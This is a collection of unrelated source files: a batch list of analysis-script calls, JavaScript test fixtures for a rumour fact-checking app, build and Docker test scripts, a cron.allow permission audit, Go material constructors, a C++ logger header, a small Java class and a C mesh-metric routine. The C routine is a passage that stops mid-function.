sh analyze_simple_1624.sh 1624A/16 1624A/18
sh analyze_simple_1624.sh 1624A/16 1624A/19
sh analyze_simple_1624.sh 1624A/16 1624A/20
sh analyze_simple_1624.sh 1624A/16 1624A/21
sh analyze_simple_1624.sh 1624A/16 1624A/22
sh analyze_simple_1624.sh 1624A/16 1624A/23
sh analyze_simple_1624.sh 1624A/17 1624A/1
sh analyze_simple_1624.sh 1624A/17 1624A/2
sh analyze_simple_1624.sh 1624A/17 1624A/3
sh analyze_simple_1624.sh 1624A/17 1624A/4
sh analyze_simple_1624.sh 1624A/17 1624A/5
sh analyze_simple_1624.sh 1624A/17 1624A/6
sh analyze_simple_1624.sh 1624A/17 1624A/7
sh analyze_simple_1624.sh 1624A/17 1624A/8
sh analyze_simple_1624.sh 1624A/17 1624A/9
sh analyze_simple_1624.sh 1624A/17 1624A/10
sh analyze_simple_1624.sh 1624A/17 1624A/11
sh analyze_simple_1624.sh 1624A/17 1624A/12
sh analyze_simple_1624.sh 1624A/17 1624A/13
sh analyze_simple_1624.sh 1624A/17 1624A/14
sh analyze_simple_1624.sh 1624A/17 1624A/15
sh analyze_simple_1624.sh 1624A/17 1624A/16
sh analyze_simple_1624.sh 1624A/17 1624A/18
sh analyze_simple_1624.sh 1624A/17 1624A/19
sh analyze_simple_1624.sh 1624A/17 1624A/20
sh analyze_simple_1624.sh 1624A/17 1624A/21
sh analyze_simple_1624.sh 1624A/17 1624A/22
sh analyze_simple_1624.sh 1624A/17 1624A/23
sh analyze_simple_1624.sh 1624A/18 1624A/1
sh analyze_simple_1624.sh 1624A/18 1624A/2
sh analyze_simple_1624.sh 1624A/18 1624A/3
sh analyze_simple_1624.sh 1624A/18 1624A/4
sh analyze_simple_1624.sh 1624A/18 1624A/5
sh analyze_simple_1624.sh 1624A/18 1624A/6
sh analyze_simple_1624.sh 1624A/18 1624A/7
sh analyze_simple_1624.sh 1624A/18 1624A/8
sh analyze_simple_1624.sh 1624A/18 1624A/9
sh analyze_simple_1624.sh 1624A/18 1624A/10
sh analyze_simple_1624.sh 1624A/18 1624A/11
sh analyze_simple_1624.sh 1624A/18 1624A/12
sh analyze_simple_1624.sh 1624A/18 1624A/13
sh analyze_simple_1624.sh 1624A/18 1624A/14
sh analyze_simple_1624.sh 1624A/18 1624A/15
sh analyze_simple_1624.sh 1624A/18 1624A/16
sh analyze_simple_1624.sh 1624A/18 1624A/17
sh analyze_simple_1624.sh 1624A/18 1624A/19
sh analyze_simple_1624.sh 1624A/18 1624A/20
sh analyze_simple_1624.sh 1624A/18 1624A/21
sh analyze_simple_1624.sh 1624A/18 1624A/22
sh analyze_simple_1624.sh 1624A/18 1624A/23
sh analyze_simple_1624.sh 1624A/19 1624A/1
sh analyze_simple_1624.sh 1624A/19 1624A/2
sh analyze_simple_1624.sh 1624A/19 1624A/3
sh analyze_simple_1624.sh 1624A/19 1624A/4
sh analyze_simple_1624.sh 1624A/19 1624A/5
sh analyze_simple_1624.sh 1624A/19 1624A/6
sh analyze_simple_1624.sh 1624A/19 1624A/7
sh analyze_simple_1624.sh 1624A/19 1624A/8
sh analyze_simple_1624.sh 1624A/19 1624A/9
sh analyze_simple_1624.sh 1624A/19 1624A/10
sh analyze_simple_1624.sh 1624A/19 1624A/11
sh analyze_simple_1624.sh 1624A/19 1624A/12
sh analyze_simple_1624.sh 1624A/19 1624A/13
sh analyze_simple_1624.sh 1624A/19 1624A/14
sh analyze_simple_1624.sh 1624A/19 1624A/15
sh analyze_simple_1624.sh 1624A/19 1624A/16
sh analyze_simple_1624.sh 1624A/19 1624A/17
sh analyze_simple_1624.sh 1624A/19 1624A/18
sh analyze_simple_1624.sh 1624A/19 1624A/20
sh analyze_simple_1624.sh 1624A/19 1624A/21
sh analyze_simple_1624.sh 1624A/19 1624A/22
sh analyze_simple_1624.sh 1624A/19 1624A/23
sh analyze_simple_1624.sh 1624A/20 1624A/1
sh analyze_simple_1624.sh 1624A/20 1624A/2
sh analyze_simple_1624.sh 1624A/20 1624A/3
sh analyze_simple_1624.sh 1624A/20 1624A/4
sh analyze_simple_1624.sh 1624A/20 1624A/5
sh analyze_simple_1624.sh 1624A/20 1624A/6
sh analyze_simple_1624.sh 1624A/20 1624A/7
sh analyze_simple_1624.sh 1624A/20 1624A/8
sh analyze_simple_1624.sh 1624A/20 1624A/9
sh analyze_simple_1624.sh 1624A/20 1624A/10
sh analyze_simple_1624.sh 1624A/20 1624A/11
sh analyze_simple_1624.sh 1624A/20 1624A/12
sh analyze_simple_1624.sh 1624A/20 1624A/13
sh analyze_simple_1624.sh 1624A/20 1624A/14
sh analyze_simple_1624.sh 1624A/20 1624A/15
sh analyze_simple_1624.sh 1624A/20 1624A/16
sh analyze_simple_1624.sh 1624A/20 1624A/17
sh analyze_simple_1624.sh 1624A/20 1624A/18
sh analyze_simple_1624.sh 1624A/20 1624A/19
sh analyze_simple_1624.sh 1624A/20 1624A/21
sh analyze_simple_1624.sh 1624A/20 1624A/22
sh analyze_simple_1624.sh 1624A/20 1624A/23
sh analyze_simple_1624.sh 1624A/21 1624A/1
sh analyze_simple_1624.sh 1624A/21 1624A/2
sh analyze_simple_1624.sh 1624A/21 1624A/3
sh analyze_simple_1624.sh 1624A/21 1624A/4
sh analyze_simple_1624.sh 1624A/21 1624A/5
sh analyze_simple_1624.sh 1624A/21 1624A/6
sh analyze_simple_1624.sh 1624A/21 1624A/7
sh analyze_simple_1624.sh 1624A/21 1624A/8
sh analyze_simple_1624.sh 1624A/21 1624A/9
sh analyze_simple_1624.sh 1624A/21 1624A/10
sh analyze_simple_1624.sh 1624A/21 1624A/11
sh analyze_simple_1624.sh 1624A/21 1624A/12
sh analyze_simple_1624.sh 1624A/21 1624A/13
sh analyze_simple_1624.sh 1624A/21 1624A/14
sh analyze_simple_1624.sh 1624A/21 1624A/15
sh analyze_simple_1624.sh 1624A/21 1624A/16
sh analyze_simple_1624.sh 1624A/21 1624A/17
sh analyze_simple_1624.sh 1624A/21 1624A/18
sh analyze_simple_1624.sh 1624A/21 1624A/19
sh analyze_simple_1624.sh 1624A/21 1624A/20
sh analyze_simple_1624.sh 1624A/21 1624A/22
sh analyze_simple_1624.sh 1624A/21 1624A/23
sh analyze_simple_1624.sh 1624A/22 1624A/1
sh analyze_simple_1624.sh 1624A/22 1624A/2
sh analyze_simple_1624.sh 1624A/22 1624A/3
sh analyze_simple_1624.sh 1624A/22 1624A/4
sh analyze_simple_1624.sh 1624A/22 1624A/5
sh analyze_simple_1624.sh 1624A/22 1624A/6
sh analyze_simple_1624.sh 1624A/22 1624A/7
sh analyze_simple_1624.sh 1624A/22 1624A/8
sh analyze_simple_1624.sh 1624A/22 1624A/9
sh analyze_simple_1624.sh 1624A/22 1624A/10
sh analyze_simple_1624.sh 1624A/22 1624A/11
sh analyze_simple_1624.sh 1624A/22 1624A/12
sh analyze_simple_1624.sh 1624A/22 1624A/13
sh analyze_simple_1624.sh 1624A/22 1624A/14
sh analyze_simple_1624.sh 1624A/22 1624A/15
sh analyze_simple_1624.sh 1624A/22 1624A/16
sh analyze_simple_1624.sh 1624A/22 1624A/17
sh analyze_simple_1624.sh 1624A/22 1624A/18
sh analyze_simple_1624.sh 1624A/22 1624A/19
sh analyze_simple_1624.sh 1624A/22 1624A/20
sh analyze_simple_1624.sh 1624A/22 1624A/21
sh analyze_simple_1624.sh 1624A/22 1624A/23
sh analyze_simple_1624.sh 1624A/23 1624A/1
sh analyze_simple_1624.sh 1624A/23 1624A/2
sh analyze_simple_1624.sh 1624A/23 1624A/3
sh analyze_simple_1624.sh 1624A/23 1624A/4
sh analyze_simple_1624.sh 1624A/23 1624A/5
sh analyze_simple_1624.sh 1624A/23 1624A/6
sh analyze_simple_1624.sh 1624A/23 1624A/7
sh analyze_simple_1624.sh 1624A/23 1624A/8
sh analyze_simple_1624.sh 1624A/23 1624A/9
sh analyze_simple_1624.sh 1624A/23 1624A/10
sh analyze_simple_1624.sh 1624A/23 1624A/11
sh analyze_simple_1624.sh 1624A/23 1624A/12
sh analyze_simple_1624.sh 1624A/23 1624A/13
sh analyze_simple_1624.sh 1624A/23 1624A/14
sh analyze_simple_1624.sh 1624A/23 1624A/15
sh analyze_simple_1624.sh 1624A/23 1624A/16
sh analyze_simple_1624.sh 1624A/23 1624A/17
sh analyze_simple_1624.sh 1624A/23 1624A/18
sh analyze_simple_1624.sh 1624A/23 1624A/19
sh analyze_simple_1624.sh 1624A/23 1624A/20
sh analyze_simple_1624.sh 1624A/23 1624A/21
sh analyze_simple_1624.sh 1624A/23 1624A/22
|
import { fromJS } from 'immutable';
// Fixture: articleDetail/SET_STATE action that turns on the `isLoading` flag.
export const setStateAction = {
  type: 'articleDetail/SET_STATE',
  payload: {
    key: 'isLoading',
    value: true,
  },
};
// Fixture: articleDetail/LOAD action carrying a full article payload
// (immutable.js Map). Includes the article's own replyConnections plus
// relatedArticles whose replies overlap — 'relatedReply1' appears under both
// related articles and 'reply1' is already attached to the article itself —
// so reducers/selectors can be tested for de-duplication.
export const loadAction = {
  type: 'articleDetail/LOAD',
  payload: fromJS({
    replyCount: 1,
    relatedArticles: {
      edges: [
        {
          node: {
            id: 'article1',
            replyConnections: [
              {
                articleId: 'article1',
                replyId: 'relatedReply1',
                canUpdateStatus: false,
                reply: {
                  id: 'relatedReply1',
                  type: 'RUMOR',
                  text: '醫師聽聞後都斥為無稽之談',
                  createdAt: '2017-10-29T03:19:56.782Z',
                },
                createdAt: '2017-11-15T08:08:08.782Z',
              },
              {
                articleId: 'article1',
                replyId: 'relatedReply2',
                canUpdateStatus: false,
                reply: {
                  id: 'relatedReply2',
                  type: 'RUMOR',
                  text: '喝冰水跟罹癌根本是兩回事',
                  createdAt: '2017-10-30T05:34:56.782Z',
                },
                createdAt: '2017-11-17T20:21:56.309Z',
              },
              {
                articleId: 'article1',
                replyId: 'reply1',
                canUpdateStatus: false,
                reply: {
                  id: 'reply1', // Already added to article (exists in replyConnections)
                  type: 'NOT_ARTICLE',
                  text:
                    '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
                  createdAt: '2017-08-30T08:09:10.111Z',
                },
                createdAt: '2017-10-29T03:19:56.782Z',
              },
            ],
          },
          score: 3.4705038,
        },
        {
          node: {
            id: 'article2',
            text: '~~黎建南給退休軍公教人員的一封公開信~~',
            replyConnections: [
              {
                articleId: 'article2',
                replyId: 'relatedReply1',
                canUpdateStatus: false,
                reply: {
                  // This is duplicated with related article 1
                  id: 'relatedReply1',
                  type: 'RUMOR',
                  text: '醫師聽聞後都斥為無稽之談',
                  createdAt: '2017-10-29T03:19:56.782Z',
                },
                createdAt: '2017-10-30T12:19:00.335Z',
              },
            ],
          },
        },
      ],
    },
    replyRequestCount: 1,
    // The article's own reply connection; the only one with canUpdateStatus
    // set to true in this fixture.
    replyConnections: [
      {
        articleId: 'article1',
        replyId: 'reply1',
        canUpdateStatus: true,
        status: 'NORMAL',
        reply: {
          id: 'reply1',
          type: 'NOT_ARTICLE',
          text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
          createdAt: '2017-08-30T08:09:10.111Z',
        },
        feedbacks: [],
        user: {
          id: 'AVqVwjqQyrDaTqlmmp_a',
          name: null,
          avatarUrl: null,
        },
        createdAt: '2017-10-29T03:19:56.782Z',
      },
    ],
    user: null,
    text: '請問這偏文章是正確嗎?',
    id: 'AV9mEFX2yCdS-nWhuiPu',
    createdAt: '2017-10-29T02:57:47.509Z',
  }),
};
// Fixture: a second articleDetail/LOAD action carrying only refreshed
// replyConnections (two entries), used to test that reloading replaces the
// reply list loaded earlier.
export const reloadRepliesAction = {
  type: 'articleDetail/LOAD',
  payload: fromJS({
    replyConnections: [
      {
        id: 'reply1',
        canUpdateStatus: true,
        status: 'NORMAL',
        reply: {
          id: 'AV9mN3dDyCdS-nWhuiP3',
          user: {
            id: 'AVqVwjqQyrDaTqlmmp_a',
            name: null,
            avatarUrl: null,
          },
          type: 'NOT_ARTICLE',
          text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
          reference: '',
          createdAt: '2017-10-29T03:40:31.938Z',
        },
        feedbacks: [],
        user: {
          id: 'AVqVwjqQyrDaTqlmmp_a',
          name: null,
          avatarUrl: null,
        },
        createdAt: '2017-10-29T03:40:31.942Z',
      },
      {
        id: 'reply2',
        canUpdateStatus: true,
        status: 'NORMAL',
        reply: {
          id: 'AV9mJJ5qyCdS-nWhuiPz',
          user: {
            id: 'AVqVwjqQyrDaTqlmmp_a',
            name: null,
            avatarUrl: null,
          },
          type: 'NOT_ARTICLE',
          text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
          reference: '',
          createdAt: '2017-10-29T03:19:56.776Z',
        },
        feedbacks: [],
        user: {
          id: 'AVqVwjqQyrDaTqlmmp_a',
          name: null,
          avatarUrl: null,
        },
        createdAt: '2017-10-29T03:19:56.782Z',
      },
    ],
  }),
};
// Fixture: articleDetail/LOAD_AUTH action granting the current user the right
// to update the status of one specific reply connection.
export const loadAuthAction = {
  type: 'articleDetail/LOAD_AUTH',
  payload: fromJS({
    replyConnections: [
      {
        articleId: 'AV9mEFX2yCdS-nWhuiPu',
        replyId: 'AV9mJJ5qyCdS-nWhuiPz',
        canUpdateStatus: true,
      },
    ],
  }),
};
// Fixture: articleDetail/LOAD_SEARCH_OF_REPLIES action — a search-result page
// of reply edges (cursor + node), each node listing the articles it is
// connected to. Note the first cursor contains a '<KEY>' placeholder as found
// in the recorded data.
export const searchRepliesAction = {
  type: 'articleDetail/LOAD_SEARCH_OF_REPLIES',
  payload: fromJS([
    {
      cursor: 'WzcuMDk5MzIsImRvYyNBV0Z3WGVpVG<KEY>',
      node: {
        id: 'AWFwXeiThutQxxU6trWM',
        text:
          '打開「台北捷運GO」 APP,選取首頁上方熊讚專屬橫幅(banner),連結至「貼圖下載」頁面,即可免費使用可愛的熊讚心情貼圖。貼圖下載活動期間為即日起至3月7日,貼圖則可使用到107年8月6日。\n',
        type: 'NOT_RUMOR',
        createdAt: '2018-02-07T13:04:18.065Z',
        replyConnections: [
          {
            article: {
              id: 'AWFwXCyvhutQxxU6trWK',
              text:
                '上面 這隻熊點他可以下載是隱藏版新圖\n如不能下載點以下連結\nline://ch/1454987169/coupon/sticker/grant\n台北捷運伴你同行\n是真的!\n( 隱藏版的免付費貼圖 )',
            },
          },
        ],
      },
    },
    {
      cursor: 'WzcuMDk5MzIsImRvYyNBV0Z1M3ZuV2h1dFF4eFU2dHJTeiJd',
      node: {
        id: 'AWFu3vnWhutQxxU6trSz',
        text:
          '台北捷運公司確實有發行此款貼圖。貼圖下載活動期間為即日起至3月7日,貼圖則可使用到107年8月6日。\n\n該連結直接導向至貼圖下載頁面,應不需加入任何可疑廣告群組。',
        type: 'NOT_RUMOR',
        createdAt: '2018-02-07T06:06:02.197Z',
        replyConnections: [
          {
            article: {
              id: 'AWFu2p62hutQxxU6trSv',
              text:
                '請下載台北捷運公司貼圖\n\nline://ch/1454987169/coupon/sticker/grant',
            },
          },
          {
            article: {
              id: 'AWFvYRb3hutQxxU6trUF',
              text:
                '免費下載貼圖\n\n台北捷運伴你同行\nline://ch/1454987169/coupon/sticker/grant\n\n這是真的哦!',
            },
          },
        ],
      },
    },
  ]),
};
// Fixture: articleDetail/LOAD_SEARCH_OF_ARTICLES action — search results of
// already-replied articles, each node carrying its reply connections.
// NOTE(review): "Repied" in the export name is a typo for "Replied"; kept
// as-is because renaming would break existing importers.
export const searchRepiedArticleAction = {
  type: 'articleDetail/LOAD_SEARCH_OF_ARTICLES',
  payload: fromJS([
    {
      node: {
        id: 'AV0_zZZeyCdS-nWhucSq',
        text:
          '限時免費貼圖大放送!\n\n只要在期限7/11~7/26前將本訊息轉傳至10個聊天室,就可獲得貼圖一款(貓貓蟲-咖波 懶惰生活)呦!\n\n(轉傳完成以後請重新開啟你的Line,點擊以下連結下載貼圖)\n\n「貓貓蟲-咖波 懶惰生活」\nhttps://line.me/S/sticker/8358',
        replyCount: 2,
        createdAt: '2017-07-14T06:33:44.284Z',
        replyConnections: [
          {
            reply: {
              id: 'AV1S6y1XyCdS-nWhucgX',
              text: '或許是另一種廣告的方式',
              createdAt: '2017-07-17T23:38:50.582Z',
              type: 'NOT_ARTICLE',
            },
          },
          {
            reply: {
              id: 'AV1AZJvIyCdS-nWhucTA',
              text:
                '在不知情使用者會把訊息傳到幾個聊天室的狀況下,當然LINE也就不可能藉由這樣的方式贈送貼圖。不管轉發10個聊天室還是100個聊天室,都不會有免費貼圖可以拿。也不會因為按了連結而發生個資被盜用的狀況。',
              createdAt: '2017-07-14T09:18:41.607Z',
              type: 'RUMOR',
            },
          },
        ],
      },
    },
    {
      node: {
        id: '5481225302468-rumor',
        text:
          'TOTAL道達爾潤滑油所推出的企業贊助貼圖,隱含惡意程式,下載或使用此貼圖會被群翻。',
        replyCount: 2,
        createdAt: '2017-01-10T08:47:00.000Z',
        replyConnections: [
          {
            reply: {
              id: '5428664755205-answer',
              text:
                '貼圖不會隱藏惡意程式。\n\nLINE 官方貼文將此則留言作為謠言的例子,呼籲大家切勿相信。Total 官方粉絲頁亦有澄清。',
              createdAt: '2016-12-30T16:35:00.000Z',
              type: 'RUMOR',
            },
          },
          {
            reply: {
              id: 'AV8WL1dfyCdS-nWhuhYV',
              text:
                '道達爾潤滑油與LINE,共同發表官方聲明:\n『一切為不實謠言,請網友勿信』,LINE相關訊息以官方公告為準。\n通訊軟體上,惡意散播下載道達爾QUARTZ機器人貼圖隱含"惡意程式",下載或使用此貼圖會被群翻之謠言,是不實消息。',
              createdAt: '2017-10-13T14:42:02.206Z',
              type: 'RUMOR',
            },
          },
        ],
      },
    },
  ]),
};
|
#!/bin/bash
# -----------------------------------------------------------------------------
#
# Copyright (C) 2021 CERN & University of Surrey for the benefit of the
# BioDynaMo collaboration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# See the LICENSE file distributed with this work for details.
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# -----------------------------------------------------------------------------
# Creates coverage report in separate directory `coverage`
# Arguments:
# $1 - Path to the project root directory
# $2 - Path to the current build directory
# $1 - project root directory; $2 - current build directory.
# Quote both so paths containing spaces survive word splitting.
PROJECT_ROOT_DIR="$1"
BUILD_DIR="$2"
set -x
pushd "$BUILD_DIR"
# -p is idempotent: no error (and no suppressed stderr) if the dir exists.
mkdir -p coverage
cd coverage
# Configure a coverage-instrumented build out of the main build tree.
cmake -Dcoverage=on "$PROJECT_ROOT_DIR" >/dev/null
cmake --build . --target all >/dev/null
# thisbdm.sh is sourced with tracing off to keep the xtrace log readable.
set +x
. bin/thisbdm.sh ""
set -x
cmake --build . --target coverage >/dev/null
popd
|
#!/bin/sh -xe
# Run tests in Container
# $1 - Fedora release tag to use for the image and pass into the build script.
# $(pwd) is quoted (the original used unquoted backticks) so a checkout path
# containing spaces does not break the volume mount.
sudo docker run --privileged -v "$(pwd)":/SCAMP:rw -it "fedora:$1" /bin/bash -c "bash -xe /SCAMP/travis/fedora_build_inside_docker.sh $1"
|
#!/usr/bin/env bash
# Audit the permission bits of /etc/cron.allow. Exits 1 if the file is not
# rw------- for the owner, or if neither cron.allow nor cron.deny exists.
res=0
# Bug fix: ${file} was never assigned in the original, so `ls -ld ${file}`
# listed the current directory instead of /etc/cron.allow.
file=/etc/cron.allow
if [ -f "${file}" ];then
  # First ls column, e.g. "-rw-------"; characters 2-10 are the mode bits.
  fileperm=$(/bin/ls -ld "${file}" | cut -f1 -d" ")
  if [ "$(echo "${fileperm}" | cut -c2)" != "r" ];then
    echo "User Read NOT set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c3)" != "w" ];then
    echo "User Write NOT set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c4)" = "x" ];then
    echo "User Execute set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c5)" != "-" ];then
    echo "Group Read set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c6)" != "-" ];then
    echo "Group Write set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c7)" != "-" ];then
    echo "Group Execute set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c8)" != "-" ];then
    echo "Other Read set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c9)" != "-" ];then
    echo "Other Write set on $file"
    res=1
  fi
  if [ "$(echo "${fileperm}" | cut -c10)" != "-" ];then
    echo "Other Execute set on $file"
    res=1
  fi
else
  # Bug fix: the original used `[ -z /etc/cron.deny ]`, which tests whether
  # the literal string is empty (always false). Test file existence instead.
  if [ ! -e /etc/cron.deny ];then
    echo "/etc/cron.allow do not exist AND /etc/cron.deny do not exist !"
    res=1
  fi
fi
if [ ${res} -ne 0 ];then
  exit 1
fi
|
<gh_stars>0
package material
import "github.com/rrothenb/pbr/pkg/rgb"
// https://i.stack.imgur.com/Q73nz.png
// Gold builds a Uniform material with a gold base color and the given
// roughness and metalness values.
func Gold(roughness, metalness float64) *Uniform {
	material := Uniform{
		Color:     rgb.Energy{1, 0.86, 0.57},
		Roughness: roughness,
		Metalness: metalness,
	}
	return &material
}
// Mirror builds a fully metallic (Metalness: 1), light-gray Uniform material
// with the given roughness.
func Mirror(roughness float64) *Uniform {
	material := Uniform{
		Color:     rgb.Energy{0.8, 0.8, 0.8},
		Roughness: roughness,
		Metalness: 1,
	}
	return &material
}
// Copper builds a Uniform material with a copper base color and the given
// roughness and metalness values.
func Copper(roughness, metalness float64) *Uniform {
	material := Uniform{
		Color:     rgb.Energy{0.98, 0.82, 0.76},
		Roughness: roughness,
		Metalness: metalness,
	}
	return &material
}
|
<gh_stars>1-10
#ifndef _LOGGER_H_
#define _LOGGER_H_
#if defined(_MSC_VER)
#pragma once
#endif
/*
* LEGAL NOTICE
* This computer software was prepared by Battelle Memorial Institute,
* hereinafter the Contractor, under Contract No. DE-AC05-76RL0 1830
* with the Department of Energy (DOE). NEITHER THE GOVERNMENT NOR THE
* CONTRACTOR MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR ASSUMES ANY
* LIABILITY FOR THE USE OF THIS SOFTWARE. This notice including this
* sentence must appear on any copies of this computer software.
*
* EXPORT CONTROL
* User agrees that the Software will not be shipped, transferred or
* exported into any country or used in any manner prohibited by the
* United States Export Administration Act or any other applicable
* export laws, restrictions or regulations (collectively the "Export Laws").
* Export of the Software may require some form of license or other
* authority from the U.S. Government, and failure to obtain such
* export control license may result in criminal liability under
* U.S. laws. In addition, if the Software is identified as export controlled
* items under the Export Laws, User represents and warrants that User
* is not a citizen, or otherwise located within, an embargoed nation
* (including without limitation Iran, Syria, Sudan, Cuba, and North Korea)
* and that User is not otherwise prohibited
* under the Export Laws from receiving the Software.
*
* Copyright 2011 Battelle Memorial Institute. All Rights Reserved.
* Distributed as open-source under the terms of the Educational Community
* License version 2.0 (ECL 2.0). http://www.opensource.org/licenses/ecl2.php
*
* For further details, see: http://www.globalchange.umd.edu/models/gcam/
*
*/
/*!
* \file logger.h
* \ingroup Objects
* \brief The Logger class header file.
* \author <NAME>
* \date $Date: 2007/01/11 23:52:34 $
* \version $Revision: 1.5.2.3 $
*/
#include <iosfwd>
#include <sstream>
#include <xercesc/dom/DOMNode.hpp>
#include "util/logger/include/ilogger.h"
// Forward definition of the Logger class.
class Logger;
class Tabs;
/*!
* \ingroup Objects
* \brief This is an overridden streambuffer class used by the Logger class.
*
* This is a very simple class which contains a pointer to its parent Logger.
* When the streambuf receives a character it passes it to its parent stream for processing.
*
* \author <NAME>
* \warning Overriding the iostream class is somewhat difficult so this class may be somewhat esoteric.
* \warning This is a write-only streambuf.
*/
// Write-only stream buffer that forwards every character it receives to its
// parent Logger. Inherits privately (default for `class`) from std::streambuf
// so it is not usable as a streambuf by outside code.
class PassToParentStreamBuf: std::streambuf {
    friend class Logger;
public:
    PassToParentStreamBuf();
    // Invoked by the ostream machinery when a character is written; hands
    // ch on to the parent Logger (the write path of this buffer).
    int overflow( int ch );
    // NOTE(review): std::streambuf::underflow() takes no argument, so this
    // does NOT override the standard read hook; since the buffer is
    // documented as write-only it is presumably unused — confirm.
    int underflow( int ch );
    // Sets the Logger that will receive all forwarded characters.
    void setParent( Logger* parentIn );
    // Writes this object's state as debug XML to the given stream.
    void toDebugXML( std::ostream& out ) const;
private:
    //! A pointer to the parent logger which will receive all data.
    Logger* mParent;
};
// Forward definition of LoggerFactory class.
class LoggerFactory;
/*!
* \ingroup Objects
* \brief This is an abstract class which defines the interface to a Logger.
* \details Loggers may come in many different forms, but must use the defined
* interface. Each error message is given a priority, and the user may
* set the level of log messages they wish to print. Loggers are
* singletons and can only be instantiated by the LoggerFactory class.
*
* \author <NAME>
* \date $Date: 2007/01/11 23:52:34 $
* \version $Revision: 1.5.2.3 $
* \warning This is an abstract class and cannot be instantiated.
* \warning Loggers can only be created by the LoggerFactory.
*/
class Logger: public ILogger {
    //! Friend declaration to allow LoggerFactory to create Loggers.
    friend class LoggerFactory;
public:
    virtual ~Logger(); //!< Virtual destructor.
    virtual void open( const char[] = 0 ) = 0; //!< Pure virtual function called to begin logging.
    int receiveCharFromUnderStream( int ch ); //!< Receives a single character forwarded by the underlying PassToParentStreamBuf. (Not virtual; the original comment here described close() instead.)
    virtual void close() = 0; //!< Pure virtual function called to complete the log and clean up.
    //! Set the current warning level for subsequent messages.
    void setLevel( const ILogger::WarningLevel newLevel );
    //! Write a debug-XML representation of this logger to the given stream.
    void toDebugXML( std::ostream& out, Tabs* tabs ) const;
protected:
    //! Logger name
    std::string mName;
    //! Logger type
    std::string mType;
    //! File name of the file it uses.
    std::string mFileName;
    //! Header message to print at the beginning of the log.
    std::string mHeaderMessage;
    //! Defines the minimum level of messages which should be printed.
    ILogger::WarningLevel mMinLogWarningLevel;
    //! Defines the minimum level of warnings to print to the console.
    ILogger::WarningLevel mMinToScreenWarningLevel;
    //! Defines the current warning level.
    ILogger::WarningLevel mCurrentWarningLevel;
    //! Defines whether to print the warning level.
    bool mPrintLogWarningLevel;
    //! Protected constructor: loggers are singletons created only by LoggerFactory.
    Logger( const std::string& aFileName = "" );
    //! Log a message with the given warning level.
    virtual void logCompleteMessage( const std::string& aMessage ) = 0;
    //! Echo the message to the console if its level passes mMinToScreenWarningLevel.
    void printToScreenIfConfigured( const std::string& aMessage );
    //! Substitute run-time values (e.g. date/time) into the header template.
    static void parseHeader( std::string& aHeader );
    //! Maximum length of a single buffered log line.
    const static int MAX_LINE_SIZE = 5000;
    //! Convert a warning level to its printable string form.
    static const std::string& convertLevelToString( ILogger::WarningLevel aLevel );
private:
    //! Buffer which contains characters waiting to be printed.
    std::stringstream mBuf;
    //! Underlying ofstream
    PassToParentStreamBuf mUnderStream;
    //! Initialize logger configuration from a parsed XML node.
    void XMLParse( const xercesc::DOMNode* node );
    //! Current time formatted as a string (for log headers).
    static const std::string getTimeString();
    //! Current date formatted as a string (for log headers).
    static const std::string getDateString();
};
#endif // _LOGGER_H_
|
/**
 * Specialization of the Central role for the left side.
 * @file CentralEsquerra.java
 */
public class CentralEsquerra extends Central{
    /**
     * Returns the fully-qualified runtime class name of this instance.
     */
    @Override
    public String toString()
    {
        String className = this.getClass().getName();
        return className;
    }
}
|
<gh_stars>0
#include <errno.h>
#include <stdlib.h>
#include <string.h>
// #include "array_indexed.h"
#include "double.h"
#include "int.h"
#include "mesh_qc.h"
/*
 * Builds the sparse metric vector for cell i of dimension p.
 *
 * The result has length m_cn_0 (the total number of 0-cells), with nonzero
 * positions copied from m_cf_p_0_i (the 0-dimensional faces, i.e. vertices,
 * of the cell) and every value set to 1 / (a0 * vol^2), where a0 is the
 * vertex count and vol the cell volume.
 *
 * Returns the newly allocated vector, or NULL on failure.
 *
 * NOTE(review): errors are detected by testing errno after each call rather
 * than checking return values -- this assumes errno is 0 on entry; confirm
 * callers guarantee that.
 */
static vector_sparse * mesh_qc_metric_p_i(
  int m_cn_0, const jagged1 * m_cf_p_0_i, int p, int i, double m_vol_p_i)
{
  double denominator_p_i;
  vector_sparse * m_metric_p_i;

  m_metric_p_i = (vector_sparse *) malloc(sizeof(vector_sparse));
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
            "m_metric[%d][%d]\n", p, i);
    goto end;
  }
  /* sparsity pattern: one entry per vertex of the cell */
  m_metric_p_i->length = m_cn_0;
  m_metric_p_i->nonzero_max = m_cf_p_0_i->a0;
  m_metric_p_i->positions =
    (int *) malloc(sizeof(int) * m_metric_p_i->nonzero_max);
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
            "m_metric[%d][%d]->positions\n", p, i);
    goto m_metric_p_i_free;
  }
  memcpy(m_metric_p_i->positions, m_cf_p_0_i->a1,
         sizeof(int) * m_metric_p_i->nonzero_max);
  m_metric_p_i->values =
    (double *) malloc(sizeof(double) * m_metric_p_i->nonzero_max);
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i - cannot allocate memory for "
            "m_metric[%d][%d]->values\n", p, i);
    goto m_metric_p_i_positions_free;
  }
  /* constant weight 1 / (vertex_count * vol^2) for every nonzero entry */
  denominator_p_i = ((double) m_cf_p_0_i->a0) * (m_vol_p_i * m_vol_p_i);
  double_array_assign_constant(
    m_metric_p_i->values, m_metric_p_i->nonzero_max, 1 / denominator_p_i);
  // vector_sparse_rearange(m_metric_p_i);
  // if (errno)
  // {
  //   fprintf(stderr,
  //     "mesh_qc_metric_p_i - cannot rearange m_metric[%d][%d]\n", p, i);
  //   goto m_metric_p_i_values_free;
  // }
  return m_metric_p_i;

